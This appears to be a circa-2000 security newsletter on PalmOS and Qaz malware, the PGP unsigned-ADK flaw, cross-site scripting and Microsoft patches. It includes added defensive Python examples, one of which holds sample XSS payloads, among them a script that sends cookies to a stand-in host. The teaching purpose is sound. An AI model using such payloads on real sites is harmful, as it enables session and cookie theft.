The big security news this last week was the PGP encryption flaw, whereby unauthorized changes to certain types of PGP keys could allow communications presumed secure to be intercepted and decrypted. The technical details can be read on the web page of the researcher who unearthed the problem, and the comments of the originator of the PGP software should also be read; both are linked below.
Apart from that, it has been a rather uneventful week all round, so much of this issue focuses on clearing the initial backlog of Microsoft security updates. There is a story about a media hype-fest over a virus that almost no-one in the world has seen and few are likely to, and a pointer to an important site for testing the security of your Windows networking configuration. Your PC may be "leaking" more information about you than you'd care to make available, so read the story about the Qaz worm (itself not much of a threat) and check out the link at the end of that item.
"Liberty Crack" first PalmOS malware
Hot on the heels of last week's newsletter reporting the first malware for EPOC handhelds, the first Trojan for PalmOS PDAs has been released. This small application (2663 bytes) presents the icon of the GameBoy emulator Liberty and the label "Crack 1.1", and is described as a crack that patches the freely distributed shareware version of Liberty into a fully registered version. If run, it instead searches for applications on the handheld, deletes them and then attempts to reset the device.
There is much controversy over this Trojan, as its author claims it was released "accidentally". He claims to have sent it to a small group of people he trusted but later decided it should not be distributed at all. By the time he tried to recall it from that first group, at least one of them had passed it on. The program is now more widely available, although as of this writing there are no confirmed reports of anyone running it unaware of what it does.
Most antivirus developers have released updates that detect this Trojan. As most PDA software is installed by copying it to a PC or Mac and then transferring it to the handheld via HotSync, conventional virus scanners can intercept this program on the PC or Mac before it reaches the PDA, should it be innocently acquired. Note that even with updated definition files, some scanners will only detect this Trojan if the Palm executable file type (.prc) is added to the list of file types they scan.
Developer unleashes Palm Trojan Horse program - Computerworld.com
Announcements and user discussion threads:
WARNING: fake liberty crack - palmstation.com
Liberty crack: What really happened - palmstation.com
Qaz worm
Although first detected three weeks ago and added to most virus scanners' detection databases, there are increasing reports of this Trojan spreading in the wild. Unlike most of the network malware in the news recently, Qaz does not mail copies of itself to others from its victims' e-mail; instead it looks for other machines on the network that are sharing their system drives.
A few years ago, such a spread mechanism would not have been viable, as few machines were so insecurely connected to networks, or at least to the Internet. The advent of DSL and cable modem Internet connections, which are usually left connected permanently, has changed this. Another factor contributing to the problem of insecure networks attached to the Internet is the increased use of "home LANs", the networking of two or more computers within a user's home. Many small business and home LAN users have little network administration experience and tend to disable password protection on shares to remove the hassle. Coupled with the naive assumption that their OS manufacturer ships such things in a secure default configuration, the result has been a huge increase in Microsoft networking shares with no password protection that are accessible across the Internet (or at least from within an ISP's dial-up or DSL network). Many tools exist to find such vulnerable machines, and several viruses and worms also take advantage of them.
To protect themselves from Qaz, users should take all the usual precautions. Do not run unexpected attachments from e-mail or unknown programs received through online chat: although Qaz does not spread itself either way, people may decide to give Qaz a boost via these methods. Regular Internet users with Microsoft OSes should also check that they are not, probably inadvertently, sharing some or all of their hard drive with the rest of the planet too. The latter is far from simple to test and can be fiddly to fix if found to be "broken", but the link below to the ShieldsUp site at Gibson Research Corporation provides an online test and much useful information on securing Microsoft networking configurations. (You may also find the "spyware" information links from the main GRC page an eye-opener too!)
Pokemon virus media hype
Several media outlets leapt on a completely overblown "virus alert" story just after last week's newsletter was posted out. Variously described as a Trojan, worm or virus depending on which antivirus web site you check, Pokemon (also known as Pokey, and as Pikachu after the Pokemon character it depicts) was first seen late in June.
As it has an almost immediate and highly destructive payload, it seemed unlikely it would ever become much of a threat. Many antivirus developers still claim not to have had a single verified report of this malware from a customer, and those that have report very low numbers. The recent media attention was generated by reporters feeding off each other's reports and the "original story" being somewhat misunderstood by the initial reporter and by the next one up the line (who really started the whole sorry mess).
I will not embarrass any particular media outlet by referencing their coverage, as most of them ran this story. The link below is to the deja.com archive copy of a message posted in a Usenet newsgroup by an employee of an antivirus company that was reported as the source of the original story. The moral of this story? Beware of journalists interviewing their typewriters...
- Usenet news archived at deja.com
Encryption flaw in PGP
Much concern has been generated over the last few days by a German researcher's discovery of a flaw in PGP's handling of Additional Decryption Keys (ADKs). ADKs were implemented in PGP to provide a form of key escrow, but in a manner that Phil Zimmermann (the original developer of PGP) was happy with. In theory, an ADK can only be added to a user's public key with the user's consent, and anyone encrypting a message to a key that carries an ADK is asked to encrypt to the ADK as well as to the key owner's personal key (which is always used). The ADK is supposed to be covered by the key owner's own signature on the key, and that is where the problem arises.
This recent research shows that many v5.x and v6.x releases of PGP erroneously honour ADKs that are not covered by the key owner's signature. To many, the most worrying thing about this attack is that it requires no action by the key owner at all. Someone in a position to intercept encrypted communications addressed to the owner of a given key could fetch that key from a public key-server, modify it by adding an unsigned ADK entry pointing at a key of the attacker's own making, and resubmit the altered key to the key-servers. Anyone who subsequently fetched the altered key and used it in correspondence the attacker intercepted would also have been encrypting to the attacker's key, so those messages could be decrypted by the attacker.
Since the discovery of this bug in PGP, all keys held on two of the largest public key-servers have been checked for this kind of deliberate tampering and none were found to be affected. Further, the major key-servers have been updated so that they no longer accept keys tampered with in this way. Finally, updates to the current versions of the PGP client software have been released with the bug patched, so these unsigned ADKs are no longer used.
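The check that the patched clients and key-servers now perform can be illustrated directly on the key material. The example below is added here and is not code from PGP, the researcher, or the key-server operators: it walks the subpacket areas of an OpenPGP v4 signature (the self-signature on a key), lists every ADK subpacket it finds, and flags those in the unhashed area, which the key owner's signature does not cover and which anyone who can edit the key can therefore append. The two sample signatures are constructed; the ADK subpacket type 10 is the one PGP used (RFC 4880 lists it only as a placeholder), and the "class" and algorithm octets in the sample ADK bodies are assumed values.

```python
"""Added example: find ADK subpackets in an OpenPGP v4 signature and flag the
ones that sit outside the signed (hashed) area.  Constructed sample data; not
code from PGP, the researcher, or this newsletter."""
import struct

# v4 signature packet body (RFC 4880, 5.2.3):
#   version(1) sigtype(1) pkalg(1) hashalg(1)
#   hashed_len(2) hashed_subpackets  unhashed_len(2) unhashed_subpackets
#   left16(2) signature MPIs
# Only the hashed area is covered by the signature; an unhashed subpacket can
# be added by anyone who can edit the key, which is the whole problem.
ADK_SUBPACKET = 10   # PGP's Additional Decryption Key subpacket (a placeholder in RFC 4880)
CREATION_TIME = 2
ISSUER = 16


def _subpacket_length(data, pos):
    """Decode the 1-, 2- or 5-octet subpacket length starting at data[pos]."""
    first = data[pos]
    if first < 192:
        return first, pos + 1
    if first < 255:
        return ((first - 192) << 8) + data[pos + 1] + 192, pos + 2
    return struct.unpack(">I", data[pos + 1:pos + 5])[0], pos + 5


def parse_subpackets(area):
    """Return [(type, body), ...] for every subpacket in a hashed or unhashed area."""
    out, pos = [], 0
    while pos < len(area):
        length, pos = _subpacket_length(area, pos)
        if length == 0 or pos + length > len(area):
            raise ValueError("malformed subpacket area")
        ptype = area[pos] & 0x7F          # top bit is the 'critical' flag
        out.append((ptype, area[pos + 1:pos + length]))
        pos += length
    return out


def split_signature(sig_body):
    """Return (hashed_area, unhashed_area) from a v4 signature packet body."""
    if sig_body[0] != 4:
        raise ValueError("only v4 signatures carry subpackets")
    hashed_len = struct.unpack(">H", sig_body[4:6])[0]
    hashed = sig_body[6:6 + hashed_len]
    p = 6 + hashed_len
    unhashed_len = struct.unpack(">H", sig_body[p:p + 2])[0]
    return hashed, sig_body[p + 2:p + 2 + unhashed_len]


def find_adks(sig_body):
    """Every ADK in the signature as (area_name, fingerprint_hex)."""
    found = []
    hashed, unhashed = split_signature(sig_body)
    for area_name, area in (("hashed", hashed), ("unhashed", unhashed)):
        for ptype, body in parse_subpackets(area):
            if ptype == ADK_SUBPACKET and len(body) >= 22:
                found.append((area_name, body[2:22].hex()))   # class(1) pkalg(1) fingerprint(20)
    return found


def unsigned_adks(sig_body):
    """ADK fingerprints the key owner never signed: the ones an attacker can plant."""
    return [fp for area, fp in find_adks(sig_body) if area == "unhashed"]


# --- constructed sample signatures -------------------------------------------
def _sp(ptype, body):
    return bytes([len(body) + 1, ptype]) + body        # one-octet length form


def build_signature(hashed_subpackets, unhashed_subpackets):
    """Minimal v4 positive-certification (0x13) body; left16 and MPI are dummies."""
    hashed, unhashed = b"".join(hashed_subpackets), b"".join(unhashed_subpackets)
    return (bytes([4, 0x13, 1, 2])                       # v4, cert, RSA, SHA-1
            + struct.pack(">H", len(hashed)) + hashed
            + struct.pack(">H", len(unhashed)) + unhashed
            + b"\x00\x00" + b"\x00\x01\x01")

OWNER_ADK = b"\xaa" * 20                 # fingerprint the owner chose (constructed)
ATTACKER_ADK = bytes(range(0x10, 0x24))  # 20 bytes the attacker chose (constructed)
_created = _sp(CREATION_TIME, b"\x39\x8f\x00\x00")
_issuer = _sp(ISSUER, b"\x01" * 8)

# Owner-consented ADK: in the hashed area, so altering it breaks the self-signature.
GOOD_SIG = build_signature([_created, _sp(ADK_SUBPACKET, b"\x80\x01" + OWNER_ADK)], [_issuer])
# Tampered key: an ADK appended to the unhashed area; the self-signature still verifies.
TAMPERED_SIG = build_signature([_created], [_issuer, _sp(ADK_SUBPACKET, b"\x80\x01" + ATTACKER_ADK)])

if __name__ == "__main__":
    for name, sig in (("good", GOOD_SIG), ("tampered", TAMPERED_SIG)):
        print(name, find_adks(sig), "unsigned:", unsigned_adks(sig))
```

The affected PGP versions honoured an ADK wherever it appeared; the fix amounts to the rule `unsigned_adks` encodes: an ADK only counts if the key owner's own signature covers it. Signature verification itself is deliberately left out, since it is the absence of coverage, not a bad signature, that the attack exploits.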
Cross-site scripting vulnerability
Early in February this year, the CERT Coordination Center released an advisory about a form of attack against the integrity of web sites. This has become widely known as the cross-site scripting vulnerability, or CSS (also abbreviated XSS, to avoid confusion with Cascading Style Sheets). The nature of this form of attack is such that there is little end users can do to prevent it, or even to reduce their exposure, except disable scripting in their web browsers. Of course, that reduces the functionality of many web sites, rendering some unnavigable.
The essential problem with CSS is that some web server design issues, and many web site programming practices, allow one user to supply "text" that is ultimately delivered to another user as part of a web page. If that material is not carefully sanitized, a malicious person can easily include HTML tags in the "text" they provide, and careless handling would then present that user-submitted HTML as part of a page subsequently served to another user. Because the second user's browser treats the page as coming from the site, any script it carries (script is embedded in HTML using tags) runs with whatever trust the user has placed in that site, and a CSS flaw in the site's design lets an attacker abuse that trust relationship.
There are many other, more subtle, CSS tricks than simply embedding script tags in user-submitted content. All web site developers who have not already carefully considered CERT's CA-2000-02 advisory on CSS issues should do so. Further, web server maintainers should check with their server's vendor for updates to the server software itself, as most server software has been updated to address some CSS weaknesses; links to the major web server vendors are included in the CERT advisory.
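To make the two preceding paragraphs concrete, here is an added example (not from the CERT advisory or any vendor) of the careless "paste the text into the page" renderer beside one that escapes each value for the context it lands in. The submissions are constructed; one is the obvious script tag, the other is one of the subtler tricks: a value that closes a quoted attribute and adds an event handler, with no script tag for a naive filter to spot. The audit function parses the rendered page the way a browser would, which is a more honest check than grepping for `<script`.

```python
"""Added example: careless guestbook rendering beside context-aware escaping,
with a parser-based check of the result.  Submissions are constructed."""
import html
from html.parser import HTMLParser

# Constructed user input, as a guestbook or comment form might receive it.
SUBMISSIONS = {
    "benign": "Nice site!",
    "script": '<script>document.location="http://evil.example/?c="+document.cookie</script>',
    # Breaks out of a quoted attribute; no <script> tag needed, so filters that
    # only look for "<script" miss it.
    "attribute": '" onmouseover="alert(document.cookie)',
}


def render_unsafe(name, comment):
    """The careless version: user text pasted straight into the page."""
    return f'<div class="entry" title="{name}"><p>{comment}</p></div>'


def render_safe(name, comment):
    """Escape each value for the context it lands in.  quote=True is required
    inside an attribute, where a bare double quote would end the value."""
    return (f'<div class="entry" title="{html.escape(name, quote=True)}">'
            f'<p>{html.escape(comment, quote=False)}</p></div>')


class _Audit(HTMLParser):
    """Record anything that became a script element or an on* event attribute."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for attr_name, _ in attrs:
            if attr_name.startswith("on"):
                self.findings.append("event handler " + attr_name)


def audit(page):
    """Parse the rendered page as a browser would and list injected script hooks."""
    parser = _Audit()
    parser.feed(page)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for label, text in SUBMISSIONS.items():
        for renderer in (render_unsafe, render_safe):
            page = renderer(text, text)     # try the value in both contexts at once
            print(f"{label:9} {renderer.__name__:13} {audit(page)}")
```

Escaping of this kind covers text and attribute contexts only. User data placed inside a URL (an `href` that can become `javascript:`) or inside an existing script block needs its own, different treatment, which is the sort of subtlety the advisory's longer discussion addresses. The audit class is a test aid for checking output, not an input filter to rely on.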
IIS cross-site scripting update
Microsoft has (finally) released updates for versions 4 and 5 of IIS that address some server-side CSS vulnerabilities. The v5 update is post-SP1 for Windows 2000 users (but does not require SP1). Anyone running IIS web servers that generate dynamic web pages is recommended to test and roll out these updates. Web site developers hosting pages on IIS servers should read the detailed coverage of CSS issues linked from the security bulletin.
Multiple Microsoft IIS updates
While on the topic of IIS updates, IIS users who are updating their servers should also check that they have the following updates installed. The first two apply to both versions 4 and 5 of IIS, while the third is specific to IIS v5; the third is unnecessary if Windows 2000 SP1 has been applied to the server.
MS Security Bulletins and FAQs:
Microsoft Money password vulnerability
A flaw in the way Microsoft Money stores passwords for its data file can result in the password being written into the file in plain text. Should this happen and other users have ready access to your Money data file, your personal data could be compromised. Note that Microsoft states in the Security Bulletin covering this problem that it is "important to note that password protection in Money is not intended to be a substitute for file-level access control, and even in the absence of this vulnerability, customers need to protect such files." One wonders how clear that really is to most Money users...
This vulnerability affects Money 2000 and Money 2001. A more detailed description and, more importantly, a patch are available from the Microsoft Product Security links below.
Microsoft Office document files may "phone home"
Recognized on-line privacy advocate Richard Smith has uncovered a potential user-tracking mechanism involving Microsoft Office products. Writing as CTO of the Privacy Foundation, Smith describes research done at the foundation showing how the concept of "web bugs" can easily be implemented in documents created with several popular Microsoft Office products.
products are vulnerable to similar use through their support for including graphics files specified via URL. As in the more traditional web bugs case just described, such graphics are stored on a web server and are retrieved for display when the Office application opens a document containing such links.
The Privacy Foundation says it has no evidence of Office documents being used this way. It is, however, concerned that Microsoft does not acknowledge that using Internet Explorer to retrieve URL-linked graphics in its Office applications means that the servers hosting such graphics can read and set cookies on the machine that opens a document carrying them. Microsoft denies this is a particularly serious problem and seems bemused that only its products have been singled out.